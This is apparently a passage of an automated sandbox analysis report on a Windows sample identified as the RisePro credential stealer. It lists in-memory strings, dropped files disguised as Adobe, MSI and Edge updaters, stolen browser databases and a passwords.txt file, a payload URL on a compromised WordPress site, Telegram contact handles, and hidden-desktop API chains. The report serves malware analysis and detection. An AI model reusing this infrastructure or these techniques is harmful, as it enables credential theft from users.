                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-includes/js/hoverIntent.min.js?ver=1.10.2
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-includes/js/jquery/ui/tabs.min.js?ver=1.13.2
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-includes/js/underscore.min.js?ver=1.13.4
                        Source: file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-json/
                        Source: file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2601798968.0000000006320000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/xmlrpc.php
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/xmlrpc.php?rsd
                        Source: file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easy2buy.ae:80/
                        Source: file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easy2buy.ae:80/ntControlSet
                        Source: file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easy2buy.ae:80/wp-content/upgrade/k.exe
                        Source: file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2601798968.0000000006320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easy2buy.j$
                        Source: file.exe, 00000000.00000003.2602210305.00000000062F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2601885569.00000000062F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easy2buyler.175
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://embed.tawk.to/64c7994d94cf5d49dc678105/1h6lqtm4g
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://fonts.googleapis.com/css?family=Poppins%3A100%2C100italic%2C200%2C200italic%2C300%2C300itali
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://fonts.googleapis.com/css?family=Poppins%3A400%2C500%2C600%2C100%2C200%2C300%2C700%2C800%2C90
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://fonts.gstatic.com/
                        Source: file.exe, 00000000.00000002.3215228010.0000000001750000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/
                        Source: file.exe, 00000000.00000002.3215228010.0000000001793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/Mozilla/5.0
                        Source: file.exe, 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
                        Source: file.exe, 00000000.00000002.3215228010.0000000001787000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/pt
                        Source: file.exe, 00000000.00000002.3215228010.0000000001793000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.0000000001769000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/widget/demo/81.181.60.11
                        Source: file.exe, 00000000.00000002.3215228010.0000000001793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io:443/widget/demo/81.181.60.11q
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://panddamarketing.com/
                        Source: file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2601798968.0000000006320000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://schema.org
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://schema.org/WPFooter
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://schema.org/WPHeader
                        Source: file.exeString found in binary or memory: https://sectigo.com/CPS0
                        Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://support.mozilla.org
                        Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                        Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                        Source: file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, _LQmmrlytjrHiMTfplY7yVS.zip.0.drString found in binary or memory: https://t.me/RiseProSUPPORT
                        Source: file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmp, passwords.txt.0.drString found in binary or memory: https://t.me/risepro_bot
                        Source: file.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_botRomania
                        Source: file.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_botisepro_bot0
                        Source: file.exe, 00000000.00000003.2084200905.0000000006308000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079811279.0000000006304000.00000004.00000020.00020000.00000000.sdmp, XT01mi44PjK3Web Data.0.dr, 7Uefi7OpyFd1Web Data.0.dr, niRQM4iEj4A_Web Data.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: file.exe, 00000000.00000003.2084200905.0000000006308000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079811279.0000000006304000.00000004.00000020.00020000.00000000.sdmp, XT01mi44PjK3Web Data.0.dr, 7Uefi7OpyFd1Web Data.0.dr, niRQM4iEj4A_Web Data.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-EK6FYVCEFT%22%3E
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://www.instagram.com/easy2buydubai/
                        Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org
                        Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                        Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                        Source: file.exe, 00000000.00000003.2601798968.0000000006320000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmp, Firefox_v6zchhhv.default-release.txt.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                        Source: file.exe, 00000000.00000003.2079094463.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086865794.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085601197.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079536613.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076251843.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084276163.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2083753605.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086248971.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084541221.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082948142.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085232013.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082172021.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078309451.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086648084.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                        Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                        Source: file.exe, 00000000.00000003.2079094463.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086865794.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085601197.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079536613.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076251843.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084276163.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2083753605.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086248971.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084541221.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082948142.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085232013.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082172021.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078309451.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086648084.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                        Source: file.exe, 00000000.00000003.2601798968.0000000006320000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmp, Firefox_v6zchhhv.default-release.txt.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                        Source: file.exe, 00000000.00000003.2079094463.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086865794.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085601197.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079536613.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076251843.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084276163.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2083753605.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086248971.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084541221.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082948142.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085232013.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082172021.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078309451.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086648084.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                        Source: file.exe, 00000000.00000003.2601798968.0000000006320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/p
                        Source: file.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/tes_1
                        Source: file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2601798968.0000000006320000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                        Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49707 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.5:49708 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 185.199.220.53:443 -> 192.168.2.5:49722 version: TLS 1.2
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B9C230 SetThreadExecutionState,SetThreadExecutionState,CreateThread,CloseHandle,GetDesktopWindow,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,shutdown,closesocket,SetThreadDesktop,Sleep,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,GetCurrentThreadId,GetThreadDesktop,BitBlt,DeleteObject,DeleteDC,ReleaseDC,Sleep,GetSystemMetrics,GetSystemMetrics,GetCurrentThreadId,GetThreadDesktop,SwitchDesktop,SetThreadDesktop,Sleep,Sleep,DeleteObject,DeleteDC,ReleaseDC,0_2_06B9C230
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B79080 OpenDesktopA,CreateDesktopA,0_2_06B79080

                        System Summary

                        barindex
                        PE file contains section with special chars
                        Source: file.exeStatic PE information: section name: .vmp\]
                        Source: file.exeStatic PE information: section name: .vmp\]
                        Source: file.exeStatic PE information: section name: .vmp\]
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B7C480 CreateProcessAsUserA,CloseHandle,CloseHandle,WaitForSingleObject,GetExitCodeProcess,0_2_06B7C480
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B4A1800_2_00B4A180
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B245600_2_00B24560
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B9AC300_2_00B9AC30
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B3F0500_2_00B3F050
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BDF4800_2_00BDF480
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B21B900_2_00B21B90
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B442A00_2_00B442A0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AE036F0_2_00AE036F
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF47BF0_2_00AF47BF
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5C80A0_2_00B5C80A
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ADA9280_2_00ADA928
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ADC9600_2_00ADC960
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B8EBA00_2_00B8EBA0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF8BB00_2_00AF8BB0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE6C500_2_00BE6C50
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF8E300_2_00AF8E30
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B92F300_2_00B92F30
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD71A00_2_00AD71A0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B435900_2_00B43590
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ACF5800_2_00ACF580
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE76900_2_00BE7690
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B8FBA00_2_00B8FBA0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE5D100_2_00BE5D10
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B7A2300_2_06B7A230
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B9C9900_2_06B9C990
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B9D5400_2_06B9D540
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B79A100_2_06B79A10
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B83B600_2_06B83B60
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B919800_2_06B91980
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BBE63B0_2_06BBE63B
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B7C7600_2_06B7C760
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B824B00_2_06B824B0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BBE2DC0_2_06BBE2DC
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B943700_2_06B94370
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BCC0100_2_06BCC010
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B98F600_2_06B98F60
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B80B900_2_06B80B90
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BC28400_2_06BC2840
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BBE9990_2_06BBE999
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B749100_2_06B74910
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BD17140_2_06BD1714
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BCF43E0_2_06BCF43E
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B972F00_2_06B972F0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B7FE500_2_06B7FE50
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BBDF9A0_2_06BBDF9A
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B95AB00_2_06B95AB0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BB78800_2_06BB7880
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B7F9D00_2_06B7F9D0
                        Source: C:\Users\user\Desktop\file.exeCode function: String function: 06BB6140 appears 58 times
                        Source: C:\Users\user\Desktop\file.exeCode function: String function: 00ABACE0 appears 64 times
